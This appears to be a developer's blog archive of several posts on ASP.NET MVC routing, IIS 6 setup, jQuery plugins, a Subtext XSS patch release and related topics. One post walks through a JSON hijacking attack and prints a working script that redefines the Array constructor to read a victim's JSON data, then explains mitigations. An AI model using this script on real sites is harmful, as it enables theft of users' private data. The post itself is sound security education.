[Image: Cody] Again, I apologize that we don’t have updated bits for you to play with, but we’ll have something next year! In the meanwhile, as the end of this year winds down, I hope it was a good one for you. It certainly was a good one for me. Enjoy your holidays, have a Merry Christmas, Hanukkah, Kwanzaa, Winter Solstice, Over Consumption Day, whatever it is you celebrate or don’t celebrate. ;)

asp.net mvc, asp.net comments edit

ASP.NET Routing is useful in many situations beyond ASP.NET MVC. For example, I often need to run a tiny bit of custom code in response to a specific request URL. Let’s look at how routing can help.

First, let’s do a quick review. When you define a route, you specify an instance of IRouteHandler associated with the route which is given a chance to figure out what to do when that route matches the request. This step is typically hidden from most developers who use the various extension methods such as MapRoute.

Once the route handler makes that decision, it returns an instance of IHttpHandler which ultimately processes the request.
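For reference, both contracts are tiny; they’re defined in System.Web.Routing and System.Web respectively:

public interface IRouteHandler {
  IHttpHandler GetHttpHandler(RequestContext requestContext);
}

public interface IHttpHandler {
  bool IsReusable { get; }
  void ProcessRequest(HttpContext context);
}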

There are many situations in which I just have a tiny bit of code I want to run and I’d rather not have to create both a custom route handler and http handler class.

So I started experimenting with some base handlers that would allow me to pass around delegates.

Warning: the code you are about to see may cause permanent blindness. This was done for fun and I’m not advocating you use the code as-is.

It works, but the readability of all these lambda expressions may cause confusion and insanity.

One common case I need to handle is permanently redirecting a set of URLs to another set of URLs. I wrote a simple extension method of RouteCollection to do just that. In my Global.asax.cs file I can write this:

routes.RedirectPermanently("home/{foo}.aspx", "~/home/{foo}");

This will permanently redirect all requests within the home directory containing the .aspx extension to the same URL without the extension. That’ll come in pretty handy for my blog in the future.

When you define a route, you have to specify an instance of IRouteHandler which handles matching requests. That instance in turn returns an IHttpHandler which ultimately handles the request. Let’s look at the simple implementation of this RedirectPermanently method.

public static Route RedirectPermanently(this RouteCollection routes, 
    string url, string targetUrl) {
  Route route = new Route(url, new RedirectRouteHandler(targetUrl, true));
  routes.Add(route);
  return route;
}

Notice that we simply create a route using the RedirectRouteHandler. As we’ll see, I didn’t even need to do this, but it helped make the code a bit more readable. To make heads or tails of this, we need to look at that handler. Warning: Some funky looking code ahead!

public class RedirectRouteHandler : DelegateRouteHandler {
  public RedirectRouteHandler(string targetUrl) : this(targetUrl, false) { 
  }

  public RedirectRouteHandler(string targetUrl, bool permanently)
    : base(requestContext => {
      if (targetUrl.StartsWith("~/")) {
        string virtualPath = targetUrl.Substring(2);
        Route route = new Route(virtualPath, null);
        var vpd = route.GetVirtualPath(requestContext, 
          requestContext.RouteData.Values);
        if (vpd != null) {
          targetUrl = "~/" + vpd.VirtualPath;
        }
      }
      return new DelegateHttpHandler(httpContext => 
        Redirect(httpContext, targetUrl, permanently), false);
    }) {
    TargetUrl = targetUrl;
  }

  // Redirect must be static because the lambda above runs as part of the
  // base constructor call, where instance members are not yet available.
  private static void Redirect(HttpContext context, string url, bool permanent) {
    if (permanent) {
      context.Response.Status = "301 Moved Permanently";
      context.Response.StatusCode = 301;
      context.Response.AddHeader("Location", url);
    }
    else {
      context.Response.Redirect(url, false);
    }
  }

  public string TargetUrl { get; private set; }
}

Note the portion of the code within the constructor that is passed to the base constructor: it is a delegate, expressed as a lambda. Rather than creating a custom IHttpHandler class, I am telling the base class what code I would want that http handler (if I had written one) to execute in order to process the request. I pass that code as a lambda expression to the base class.

I think in a production system, I’d probably manually implement RedirectRouteHandler. But while I’m having fun, let’s take it further.

Let’s look at the DelegateRouteHandler to understand this better.

public class DelegateRouteHandler : IRouteHandler {
  public DelegateRouteHandler(Func<RequestContext, IHttpHandler> action) {
    HttpHandlerAction = action;
  }

  public Func<RequestContext, IHttpHandler> HttpHandlerAction {
    get;
    private set;
  }

  public IHttpHandler GetHttpHandler(RequestContext requestContext) {
    var action = HttpHandlerAction;
    if (action == null) {
      throw new InvalidOperationException("No action specified");
    }
    
    return action(requestContext);
  }
}

Notice that the first constructor argument is a Func<RequestContext, IHttpHandler>. This is effectively the contract for an IRouteHandler. This alleviates the need to write new IRouteHandler classes, because we can instead just create an instance of DelegateRouteHandler directly passing in the code we would have put in the custom IRouteHandler implementation. Again, in this implementation, to make things clearer, I inherited from DelegateRouteHandler rather than instantiating it directly. To do that would have sent me to the 7th level of Hades immediately. As it stands, I’m only on the 4th level for what I’ve shown here.

The last thing we need to look at is the DelegateHttpHandler.

public class DelegateHttpHandler : IHttpHandler {

  public DelegateHttpHandler(Action<HttpContext> action, bool isReusable) {
    IsReusable = isReusable;
    HttpHandlerAction = action;
  }

  public bool IsReusable {
    get;
    private set;
  }

  public Action<HttpContext> HttpHandlerAction {
    get;
    private set;
  }

  public void ProcessRequest(HttpContext context) {
    var action = HttpHandlerAction;
    if (action != null) {
      action(context);
    }
  }
}

Again, you simply pass this class an Action<HttpContext> within the constructor which fulfills the contract for IHttpHandler.

The point of all this is to show that when you have an interface with a single method, it can often be transformed into a delegate by writing a helper implementation of that interface which accepts delegates that fulfill the same contract, or at least come close enough.

This would allow me to quickly hack up a new route handler without adding two new classes to my project. Of course, the syntax to do so is prohibitively dense, so for the sake of those who have to read the code, I’d probably recommend just writing the new classes.

In any case, however you implement them, the Redirect and RedirectPermanently extension methods for handling routes are still quite useful.

personal comments edit

UPDATE: There’s a workaround mentioned in the Google Groups. It’s finally resolved.

Ever since I first started using FeedBurner, I was very happy with the service. It was exactly the type of service I like: fire and forget, and it just worked. My bandwidth usage went down and I gained access to a lot of interesting stats about my feed.

When I was first considering it, others warned me about losing control over my RSS feed. That led me to pay for the MyBrand PRO feature which enabled me to burn my feed using my own domain name at http://feeds.haacked.com/haacked by simply creating a CNAME from feeds.haacked.com to feeds.feedburner.com.

The idea was that if I ever wanted to reclaim my feed because something happened to FeedBurner or because I simply wanted to change, I could simply remove the CNAME and serve up my feed itself.

That was the idea at least.

This week, I learned the fatal flaw in that plan. When Google bought FeedBurner, nothing really changed immediately, so I was completely fine with it. But recently, they decided to change the domain over to a google domain. I had assumed they would do a CNAME to their own domain for MyBrand users. Instead, I saw that they were redirecting users to their own domain, thus taking control away from me over my own feed and completely nullifying the whole point of the MyBrand service.

That’s right. People who were subscribed via my feeds.haacked.com domain were being redirected to a google domain.

Ok, perhaps I’m somewhat at fault for ignoring the email on November 25 announcing the transition, but I’m a busy guy and that didn’t leave me much time to plan the transition.

And even if I had, I would have still been screwed. I followed the instructions provided and set up a CNAME from feeds.haacked.com to haackedgmail.feedproxy.ghs.google.com and watched the next day as my subscriber count dropped from 11,000 to 827. I’ve since changed the CNAME back to the feedburner.com domain (I tried several variations of the CNAME beforehand) and am resigned to let the redirect happen for now.

In the meanwhile, I’ve set up a CNAME from feeds3.haacked.com to the one they gave me and it still doesn’t work. At the time I write this, http://feeds3.haacked.com/haacked gives a 404 error.

I’m very disappointed in the haphazard manner in which they’ve made this transition, but I’m willing to give them a second chance if they’d only fix the damn MyBrand service.

asp.net mvc, asp.net comments edit

While at PDC, I met Louis DeJardin and we had some lively discussions on various topics around ASP.NET MVC. He kept bugging me about some view engine called Flint? No… Electricity? No… Spark!

I had heard of it, but never got around to actually playing with it until after the conference. And the verdict is, I really like it.

Spark is a view engine for both MonoRail and ASP.NET MVC. It supports multiple content area layouts, much like master pages, which is one thing that seems to be lacking in many other view engines I’ve seen; most only support a single content area (correct me if I’m wrong). Not only that, but he’s already included IronPython and IronRuby support.

But what I really like about it is the simple way you effectively data bind HTML elements to code. Let’s start with a simple example. Suppose you have an enumeration of products you’re passing to the view from your controller action. Here’s how you might render it in Spark.

<viewdata model="IEnumerable[[Product]]"/>

<ul class="products">
  <li each="var product in ViewData.Model">${product.ProductName}</li>
</ul>

Note the each attribute of the <li> tag contains a code expression. This will repeat the <li> tag once per product. The <viewdata> element there declares the type of the ViewData.Model property.

Spark still supports using code nuggets <% %> when you absolutely need them. For example, when using the BeginForm method, I needed a using block, so I used the code nuggets.

Just for fun, I redid the views of my Northwind sample to replace all the ASPX views with Spark as a demonstration of using an alternative view engine. Try it out.

UPDATE: Updated to the latest version of ASP.NET MVC and Spark as of ASP.NET MVC 1.0 RC 2.

asp.net mvc, asp.net comments edit

I’m working to try and keep internal release notes up to date so that I don’t have this huge amount of work when we’re finally ready to release. Yeah, I’m always trying something new by giving procrastination a boot today.

These notes were sent to me by Jacques, a developer on the ASP.NET MVC feature team. I only cleaned them up slightly.

The sections below contain descriptions and possible solutions for known issues that may cause the installer to fail. The solutions have proven successful in most cases.

Visual Studio Add-ins

The ASP.NET MVC installer may fail when certain Visual Studio add-ins are already installed. The final steps of the installation install and configure the MVC templates in Visual Studio. When the installer encounters a problem during these steps, the installation will be aborted and rolled back. MVC can be installed from a command prompt using msiexec to produce a log file as follows:

msiexec /i AspNetMVCBeta-setup.msi /q /l*v mvc.log

If an error occurred, the log file will contain an error message similar to the example below.

MSI (s) (C4:40) [20:45:32:977]: Note: 1: 1722 2: VisualStudio_VSSetup_Command 3: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe 4: /setup

MSI (s) (C4:40) [20:45:32:979]: Product: Microsoft ASP.NET MVC Beta – Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action VisualStudio_VSSetup_Command, location: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe, command: /setup

Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action VisualStudio_VSSetup_Command, location: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe, command: /setup

This error is usually accompanied by a corresponding event that will be logged in the Windows Event Viewer:

Faulting application devenv.exe, version 9.0.30729.1, time stamp 0x488f2b50, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x006c0061, process id 0x10e0, application start time 0x01c9355ee383bf70

In most cases, removing the add-ins before installing MVC, and then reinstalling the add-ins, will resolve the problem. ASP.NET MVC installations have been known to run into problems when the following add-ins were already installed:

  • PowerCommands
  • Clone Detective

Cryptographic Services

In a few isolated cases, the Windows Event Viewer may contain an Error event with event source CAPI2 and event ID 513. The event message will contain the following: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

The article at http://technet.microsoft.com/en-us/library/cc734021.aspx describes various steps a user can take to correct the problem, but in some cases simply stopping and restarting the Cryptographic services should allow the installation to proceed.

subtext comments edit

A Subtext user found a security flaw which opens up Subtext to potential XSS attacks via comment. This flaw was introduced in Subtext 2.0 by the feature which converts URLs to anchor tags. If you are still on 1.9.5b or before, you are not affected by this issue. If you upgraded to 2.0, then please update to 2.1 as soon as you can.

Note that you can edit comments in the admin section of your blog to fix comments if someone attempts to abuse your comments.

This release has several other bug fixes and usability improvements as well. I started to replace the use of UpdatePanel in some areas with straight up jQuery, which ends up reducing bandwidth usage.

List of bug fixes and changes:

  • Fixed Medium Trust issue by removing calls to UrlAuthorizationModule.CheckUrlAccessForPrincipal which is not allowed from medium trust.
  • Removed email address from RSS feed by default and added Web.config setting to change this in order to protect against spamming.
  • Upgraded Jayrock assembly to fix the issue with VerificationException being thrown.
  • Fixed code which strips HTML from comments when displaying recent comments. Certain cases would cause CPU spike.
  • Fixed Remember Me functionality for the OpenID login.
  • Fixed a bug with adding categories in which an error was displayed, even though the category was added correctly.
  • Fixed a bug in the code to convert URLs to anchor tags.
  • Upgraded jQuery to version 1.2.6
  • Improved the timezone selection UI with jQuery

I was the one who implemented the feature at fault. Unfortunately the way the feature was written made it such that it reversed earlier scrubbing of the HTML due to a mistake in how I used SgmlReader. I apologize for the mistake. It won’t happen again.

Many thanks go out to Adrian Bateman for pointing out the bug and the fix.

Notes for new installations

The install package includes a default Subtext2.1.mdf file for SQL 2005 Express. If you plan to run your blog off of SQL Server Express, installation is as easy as copying the install files to your Web Root. If you’re not using SQL Express, but plan to use SQL Server 2005, you can attach to the supplied .mdf file and use it as your database.

Notes for upgrading

In the app_data folder of the install package, feel free to delete the database files there. They only apply to new installs. Subtext 2.1 does not have any schema changes, so upgrading should be smooth.

Full upgrade instructions are on the Subtext project website.

Download it here. Note that Subtext-2.1.0.5.zip is the file you want to use to upgrade your site. The other file contains the source, in case you want to build the solution yourself.

subtext comments edit

How many of you out there who use Subtext host it with a hosting provider that does not have ASP.NET 3.5 available? I’d like the next version of Subtext 2 to take a dependency on ASP.NET 3.5. Note that it wouldn’t have to take a dependency on SP1, just ASP.NET 3.5 proper, as I believe most hosting providers support it.

If you’re stuck with a hosting provider who only supports ASP.NET 2.0 and not 3.5, do leave a comment.

Note that we’re still in the planning stages for Subtext 3, which will be built on ASP.NET MVC. In the meantime, I still plan to update Subtext 2.*. In fact, much of the work we will do for Subtext 3 may be prototyped in 2.* and ported over.

asp.net mvc, asp.net comments edit

UPDATE: If you run ASP.NET MVC on IIS 6 with ASP.NET 4, setting up extensionless URLs just got easier. In most cases, it should just work.

I’ve seen a lot of reports where people have trouble getting ASP.NET MVC up and running on IIS 6. Sometimes the problem is a very minor misconfiguration, sometimes it’s a misunderstanding of how IIS 6 works.

In this post, I want to provide a definitive guide to getting ASP.NET MVC running on IIS 6. I will walk through using the .mvc or .aspx file extension for URLs first, then I will walk through using extension-less URLs.

If you’re running into problems with IIS 6 and ASP.NET MVC, I recommend trying to walk through all the steps in this post, even if you’re not interested in using the .mvc or .aspx mapping. Some of the lessons learned here have more to do with how ASP.NET itself works with IIS 6 than anything specific to ASP.NET MVC.

Initial Setup

To make this easy, start Visual Studio and create a new ASP.NET MVC Web Application Project on the machine running IIS 6. If IIS 6 is on a different machine, you can skip this step; we can deploy the site to that machine later.

After you create the project, right-click the project and select Properties. The project properties editor will open up. Select the Web tab and select Use IIS Web Server. Click on the image for a full size view.

Project Properties Editor

For the project URL, I gave it a virtual application name of Iis6DemoWeb and then checked Create Virtual Directory. A dialog box should appear, and you should now have an IIS virtual application (note this is different from a virtual directory, as indicated by the gear-like icon) under your Default Web Site.

IIS 6 Virtual Web Application

Using a URL File Extension

When you run the ASP.NET MVC installer, it will set up an ISAPI mapping in IIS 6 to map the .mvc extension to the aspnet_isapi.dll. This is necessary in order for IIS to hand off requests using the .mvc file extension to ASP.NET.

If you’re planning to use extension-less URLs, you can skip this section, but it may be useful to read anyway, as it contains some information you’ll need to know when setting up extension-less URLs.

Mapping .mvc to ASP.NET

If you plan to use the .mvc URL extension, and are going to deploy to IIS 6 on a machine that does not have ASP.NET MVC installed, you’ll need to create this mapping by performing the following steps.

One nice benefit of using the .aspx extension instead of .mvc is that you don’t have to worry about mapping the .aspx extension. It should already be mapped assuming you have ASP.NET installed properly on the machine.

For the rest of you, start by right-clicking the Virtual Application node (IIS6DemoWeb in this case) and select Properties. You should see the following dialog.

Website Properties

Make sure you’re on the Virtual Directory tab and select Configuration. Note that you can also choose to make this change on the root website, in which case the tab you’re looking for is Home Directory, not Virtual Directory.

This will bring up the Application Configuration dialog which displays a list of ISAPI mappings. Scroll down to see if .mvc is in the list.

Application mappings

In the screenshot, you can see that .mvc is in the list. If it is in the list on your machine, you can skip ahead to the next section. If it’s not, let’s add it. You’re going to need to know the path to the aspnet_isapi.dll first. On my machine, it is:

c:\windows\microsoft.net\framework\v2.0.50727\aspnet_isapi.dll

It might differ on your machine. One easy way to find out is to find the .aspx extension in the list and double-click it to bring up the mapping dialog.

Extension mapping

Now you can copy the path in the Executable text box to your clipboard. This is the path you’ll want to map .mvc to.

Click Cancel to go back to the Application Configuration dialog and then click Add, which will bring up an empty Add/Edit Application Extension Mapping dialog.

Fill in the fields with the exact same values as you saw for .aspx, except the extension should be “.mvc” without the quotes. Click OK and you’re done with the mapping.

Specifying Routes with an Extension

Before we run the application, we need to update the default routes to look for the file extension we chose, whether that’s .mvc or .aspx. Here is the RegisterRoutes method in my Global.asax.cs file using the .mvc extension. If you want to use the .aspx extension, just replace {controller}.mvc with {controller}.aspx.

public static void RegisterRoutes(RouteCollection routes)
{
  routes.IgnoreRoute("{resource}.axd/{*pathInfo}");

  routes.MapRoute(
    "Default",
    "{controller}.mvc/{action}/{id}",
    new { action = "Index", id = "" }
  );

  routes.MapRoute(
    "Root",
    "",
    new { controller = "Home", action = "Index", id = "" }
  );
}

Note that because the “Default” route has a literal extension as part of its URL pattern, it cannot match a request for the application root. That’s why I added the “Root” route, which can match requests for the application root.

Now, I can hit CTRL+F5 (or browse my website) and I should see the following home page.

Home Page

And about page.

About Page

Notice that the URLs contain the .mvc extension.

Uh oh, Houston! We have a problem

Of course, you’re going to want to be able to navigate to the web root for your project. Notice what happens when you navigate to /Iis6DemoWeb.

Root Home Page

This is a bug in the Default.aspx.cs file included with our default template which I discovered as I was writing this walkthrough. We’ll fix it right away, but I can provide the fix here as it’s insanely easy.

Note: If you received a File Not Found error when visiting the root, then you might not have Default.aspx mapped as a default document. Follow these steps to add Default.aspx as a default document.

As I’ve written before, this file is necessary for IIS 6, IIS 7 Classic Mode, and pre-SP1 Cassini, but not for IIS 7 Integrated Mode. So if you’re using Cassini with Visual Studio 2008 SP1 and deploying to IIS 7 Integrated Mode, you can delete Default.aspx and its sub-files.

In the meantime, the fix is to make the following change.

Change:

HttpContext.Current.RewritePath(Request.ApplicationPath);

To

HttpContext.Current.RewritePath(Request.ApplicationPath, false);

If you had created your website in the IIS root rather than in a virtual application, you would never have noticed this issue. But in a virtual application, the rendered stylesheet URL incorrectly contained the virtual application name. Changing the second argument to false fixes this.
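For context, here’s roughly what the template’s Default.aspx.cs looks like with the fix applied. This is a sketch rather than the exact shipped file (the namespace matches my demo project), but the shape is the same: rewrite the path, then hand the request off to MvcHttpHandler.

using System.Web;
using System.Web.Mvc;
using System.Web.UI;

namespace Iis6DemoWeb
{
  // Sketch of the Default.aspx code-behind with the fix applied.
  public partial class _Default : Page
  {
    public void Page_Load(object sender, System.EventArgs e)
    {
      // Rewrite the path so routing sees a request for the application root.
      // Passing false as the second argument keeps the client path used to
      // resolve relative URLs (like the stylesheet link) unchanged.
      HttpContext.Current.RewritePath(Request.ApplicationPath, false);

      IHttpHandler httpHandler = new MvcHttpHandler();
      httpHandler.ProcessRequest(HttpContext.Current);
    }
  }
}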

IIS6 Extension-less URLs

OK, now we’re ready to try this with extension-less URLs using the infamous “Star mapping” or “Wildcard mapping” feature of IIS 6. I say infamous because there is a lot of concern over the performance implications of doing this. Of course, you should measure the performance of your site for yourself to determine whether it is really a problem.

The first step is to go back to the Application Configuration Properties dialog like we did when configuring the .mvc ISAPI mapping (see, I told you that information might come in useful later).

Application mappings

Next to the Wildcard application maps section, click the Insert… button.

Wildcard extension mapping

This brings up the wildcard application mapping dialog. Enter the path to the aspnet_isapi.dll. You can follow the trick we mentioned earlier for getting this path.

Don’t forget to uncheck the Verify that file exists checkbox! This is one of the most common mistakes people make.

If you’ve been following along with everything in this post, you’ll need to go back and reset the routes in your Global.asax.cs file to the default routes; you no longer need the .mvc file extension in the routes. At this point, you can also remove Default.aspx if you’d like, as it’s no longer needed.
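For reference, the routes you’d revert to look roughly like the standard project template’s RegisterRoutes method, without the extension and without the extra “Root” route:

public static void RegisterRoutes(RouteCollection routes)
{
  routes.IgnoreRoute("{resource}.axd/{*pathInfo}");

  routes.MapRoute(
    "Default",                                              // Route name
    "{controller}/{action}/{id}",                           // URL pattern
    new { controller = "Home", action = "Index", id = "" }  // Parameter defaults
  );
}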

Now when you browse your site, your URLs will not have a file extension as you can see in the following screenshots.

Home page without extension

About page without extension


Final Tips

One thing to understand is that an ASP.NET project is scoped to the Website or Virtual Application in which it resides. For example, in the example I have here, we pointed a Virtual Application named IIS6DemoWeb to the directory containing my ASP.NET MVC web application.

Thus, only requests for that virtual application will be handled by my web application. I cannot make a request for http://localhost/ in this case and expect it to be handled by my application. Nor can I expect routing in this application to handle requests for another root directory such as http://localhost/not-my-app/.

This might seem like an obvious thing to say, but I know it trips some people up. Also, in the example I did here, I used a virtual application for demonstration purposes. It’s very easy to point a root Website in IIS to my application and run it in http://localhost/ rather than a virtual application. This is not a problem. I hope you found this helpful.

asp.net comments edit

As I mentioned before, I’m really excited that we’re shipping jQuery with ASP.NET MVC and with Visual Studio moving forward. Just recently, we issued a patch that enables jQuery Intellisense to work in Visual Studio 2008.

But if you’re new to jQuery, you might sit down at your desk ready to take on the web with your newfound JavaScript light saber, only to stare blankly at an empty screen asking yourself, “Is this it?”

See, as exciting and cool as jQuery is, it’s really the vast array of plugins that gives jQuery its star power. Today I wanted to play around with integrating two jQuery plugins: the jQuery Form plugin, used to submit forms asynchronously, and the jQuery Validation plugin, used to validate input.

Since this is a prototype for something I might patch into Subtext, which still targets ASP.NET 2.0, I used Web Forms for the demo, though what I do here easily applies to ASP.NET MVC.

Here are some screenshots of it in action. When I click the submit button, it validates all the fields. The email field is validated after the input loses focus.

validation

When I correct the data and click “Send Comment”, it will asynchronously display the posted comment.

async-comment-response

Let’s look at the code to make this happen. Here’s the relevant HTML markup in my Default.aspx page:

<div id="comments" ></div>

<form id="form1" runat="server">
<div id="comment-form">
  <p>
    <asp:Label AssociatedControlID="title" runat="server" Text="Title: " />
    <asp:TextBox ID="title" runat="server" CssClass="required" />
  </p>
  <p>
    <asp:Label AssociatedControlID="email" runat="server" Text="Email: " />
    <asp:TextBox ID="email" runat="server" CssClass="required email" />
  </p>
  <p>
    <asp:Label AssociatedControlID="body" runat="server" Text="Body: " />
    <asp:TextBox ID="body" runat="server" CssClass="required" />
  </p>
  <input type="hidden" name="<%= submitButton.ClientID %>" 
    value="Send Comment" />
  <asp:Button runat="server" ID="submitButton" 
    OnClick="OnFormSubmit" Text="Send Comment" />
</div>
</form>

I’ve called out a few important details in the code. The top DIV is where I will put the response of the AJAX form post. The CSS classes on the form elements provide validation metadata to the Validation plugin. And what the heck is that hidden input doing there?

Notice the hidden input that duplicates the field name of the submit button. That’s the ugly hack. The jQuery Form plugin doesn’t actually submit the value of the submit button, and I needed that value to be submitted in order for the code behind to work. When you click the submit button, a method named OnFormSubmit gets called in the code behind.

Let’s take a quick look at that method in the code behind.

protected void OnFormSubmit(object sender, EventArgs e) {
    var control = Page.LoadControl("~/CommentResponse.ascx") 
        as CommentResponse;
    control.Title = title.Text;
    control.Email = email.Text;
    control.Body = body.Text;

    var htmlWriter = new HtmlTextWriter(Response.Output);
    control.RenderControl(htmlWriter);
    Response.End();
}

Notice here that I’m just instantiating a user control, setting some properties on it, and then rendering it to the output stream. I can access the values in the submitted form through the ASP.NET controls.

This is sort of like the Web Forms equivalent of ASP.NET MVC’s partial rendering à la the return PartialView() method. Here’s the code for that user control.

<%@ Control Language="C#" CodeBehind="CommentResponse.ascx.cs" 
    Inherits="WebFormValidationDemo.CommentResponse" %>
<div style="color: blue; border: solid 1px brown;">
    <p>
        Thanks for the comment! This is what you wrote.
    </p>
    <p>
        <label>Title:</label> <%= Title %>
    </p>
    <p>
        <label>Email:</label> <%= Email %>
    </p>
    
    <p>
        <label>Body:</label> <%= Body %>
    </p>
</div>

Along with its code behind.

public partial class CommentResponse : System.Web.UI.UserControl {
    public string Title { get; set; }
    public string Email { get; set; }
    public string Body { get; set; }
}

Finally, let’s look at the script in the head section that ties this all together and makes it work.

<script src="scripts/jquery-1.2.6.min.js" type="text/javascript"></script>
<script src="scripts/jquery.validate.js" type="text/javascript"></script>
<script src="scripts/jquery.form.js" type="text/javascript"></script>
<% if (false) { %>
<script src="scripts/jquery-1.2.6-vsdoc.js" type="text/javascript"></script>
<% } %>
<script type="text/javascript">
    $(document).ready(function() {
        $("#<%= form1.ClientID %>").validate({
            submitHandler: function(form) {
                jQuery(form).ajaxSubmit({
                    target: "#comments"
                });
            }
        });
    });
</script>

The if (false) block is there for jQuery Intellisense, which only matters to me at design time, not at runtime.

What we’re doing here is getting a reference to the form and calling the validate method on it. This sets up the form for validation based on the validation metadata stored in the CSS classes of the form inputs. It’s possible to specify these rules completely externally, but one nice thing about this approach is that you can style the fields based on their validation attributes.

We then register a submit handler that calls the jQuery Form plugin’s ajaxSubmit method, so when the form is valid, it gets posted asynchronously. In the arguments to that method, I specify the #comments selector as the target, so the response from the form submission gets put there.

As I mentioned before, the hidden input just ensures that ASP.NET runs its page lifecycle in response to the form post so I can handle the response in the button’s event handler. In ASP.NET MVC, you’d just point the form at an action method instead and not worry about adding the hidden input.
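For illustration, here’s a rough sketch of what the MVC version might look like. The controller, action name, and view name here are made up; the partial view would render the same markup as the user control above.

using System.Web.Mvc;

public class CommentsController : Controller
{
  // Hypothetical action the form would post to asynchronously.
  [AcceptVerbs(HttpVerbs.Post)]
  public ActionResult Add(string title, string email, string body)
  {
    ViewData["Title"] = title;
    ViewData["Email"] = email;
    ViewData["Body"] = body;

    // Renders a partial view (e.g. CommentResponse.ascx) straight back
    // to the client, much like the user control render above.
    return PartialView("CommentResponse");
  }
}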

In any case, play around with these two plugins as they provide way more rich functionality than what I covered here.

asp.net, code comments edit

I recently learned about a very subtle potential security flaw when using JSON. While subtle, it was successfully demonstrated against GMail a while back. The post, JSON is not as safe as people think it is, covers it well, but I thought I’d provide step-by-step coverage to help make it clear how the exploit works.

The exploit combines Cross-Site Request Forgery (CSRF) with a JSON array hack, allowing an evil site to grab sensitive user data from an unsuspecting user. The hack involves redefining the Array constructor, which is totally legal in JavaScript.

Let’s walk through the attack step by step. Imagine that you’re logged in to a trusted site. The site makes use of JavaScript which makes GET requests to a JSON service:

GET: /demos/secret-info.json

that returns some sensitive information:

["Philha", "my-confession-to-crimes", 7423.42]

Now, you need to be logged in to get this data. If you open a fresh browser and type in the URL to /demos/secret-info.json, you’ll get redirected to a login page (in my demo that’s not the case; you’ll have to trust me on this).

But now suppose you accidentally visit evil.com, which has the following scripts in its <head /> section. Notice that the second script references the JSON service on the good site.


<script type="text/javascript">
var secrets;

Array = function() {
  secrets = this;
};
</script>

<script src="http://haacked.com/demos/secret-info.json" 
  type="text/javascript"></script>

<script type="text/javascript">

  var yourData = '';
  var i = -1;
  while(secrets[++i]) {
    yourData += secrets[i] + ' ';
  }

  alert('I stole your data: ' + yourData);
</script>

When you visit the page, you will see the following alert dialog…

evil alert message

…which indicates that the site was able to steal your data.

How does this work?

There are two key parts to this attack. The first is that although browsers stop you from being able to make cross-domain HTTP requests via JavaScript, you can still use the src attribute of a script tag to reference a script in another domain and the browser will make a request and load that script.

The worst part of this is that the request for that script file is being made by your browser with your credentials. If your session on that site is still valid, the request will succeed and now your sensitive information is being loaded into your browser as a script.

That might not seem like a problem at this point. So what if the data was loaded into the browser? The browser is on your machine, and a JSON response is not typically valid as the source for a JavaScript file. For example, if the response was…

{"d": ["Philha", "my-confession-to-crimes", 7423.42]}

…pointing a script tag at that response would cause an error in the browser. So how’s the evil guy going to get the data from my browser to his site?

Well, it turns out that a JSON array is valid as the source for a JavaScript script tag. But the array isn’t assigned to anything, so it would just be evaluated and then discarded, right? What’s the big deal?

That’s where the second part of this attack comes into play.

var secrets;
Array = function() {
  secrets = this;
};

JavaScript allows us to redefine the Array constructor. In the evil script above, we redefine the array constructor and assign the array to a global variable we defined. Now we have access to the data in the array and can send it to our evil site.

In the sample I posted above, I just wrote out an alert. But it would be very easy to instead document.write a 1-pixel image tag whose URL contains all the data from the JSON response.

Mitigations

One common mitigation is to make sure that your JSON service always returns its response as a non-array JSON object. For example, ASP.NET Ajax script services always wrap the response in an object with a “d” property, just like I demonstrated above. This is described in detail in this quickstart:

The ASP.NET AJAX library uses the “d” parameter formatting for JSON data. This forces the data in the example to appear in the following form:

{“d” : [“bankaccountnumber”, “$1234.56”] }

Because this is not a valid JavaScript statement, it cannot be parsed and instantiated as a new object in JavaScript. This therefore prevents the cross-site scripting attack from accessing data from AJAX JSON services on other domains.

The Microsoft Ajax client libraries automatically strip the “d” out, but other client libraries, such as jQuery, would have to take the “d” property into account when using such services.

Another potential mitigation, one that ASP.NET Ajax services do by default too, is to only allow POST requests to retrieve sensitive JSON. Since the script tag will only issue a GET request, a JSON service that only responds to POST requests would not be susceptible to this attack, as far as I know.
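To make that concrete, here’s a minimal ASP.NET MVC sketch combining both mitigations; the controller, action, and data are hypothetical, not an actual service.

using System.Web.Mvc;

public class SecretsController : Controller
{
  // Hypothetical endpoint for illustration only.
  [AcceptVerbs(HttpVerbs.Post)]  // a <script src="..."> tag can only issue a GET
  public ActionResult SecretInfo()
  {
    var secrets = new object[] { "Philha", "my-confession-to-crimes", 7423.42 };

    // Wrapping the array in an object means the response is not a valid
    // JavaScript statement on its own, so a script tag can't evaluate it.
    return Json(new { d = secrets });
  }
}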

For those keeping track, this is why I recently asked on Twitter how many people use GET requests for JSON endpoints.

How bad is this?

It seems like this could be extremely bad, as not many people know about this vulnerability. After all, if GMail was successfully exploited via this vulnerability, who else is vulnerable?

The good news is that it seems to me that most modern browsers are not affected by this. I have a URL you can click on to demonstrate the exploit, but you have to use Firefox 2.0 or earlier to get the exploit to work. It didn’t work with IE 6, 7, or 8, Firefox 3, or Google Chrome.

Take this all with a grain of salt of course because there may be a more sophisticated version of this exploit that does work with modern browsers.

So the question I leave to you, dear reader, is given all this, is it acceptable to you for a JSON service containing sensitive data to require a POST request to obtain that data, or would that inspire righteous RESTafarian rage?

asp.net mvc comments edit

Pop quiz. What would you expect these three bits of HTML to render?

<!-- no new lines after textarea -->
<textarea>Foo</textarea>

<!-- one new line after textarea -->
<textarea>
Foo</textarea>

<!-- two new lines after textarea -->
<textarea>

Foo</textarea>

The fact that I’m even writing about this might make you suspicious of your initial gut answer. Mine would have been that the first would render a text area with “Foo” on the first line, the second with it on the second line, and the third with it on the third line.

In fact, here’s what it renders using Firefox 3.0.3. I confirmed the same behavior with IE 8 beta 2 and Google Chrome.

Three text areas

Notice that the first two text areas are identical. Why is this important?

Suppose you’re building an ASP.NET MVC website and you call the following bit of code:

<%= Html.TextArea("name", "\r\nFoo") %>

You probably would expect to see the third text area in the screenshot above in which “Foo” is rendered on the second line, not the first.

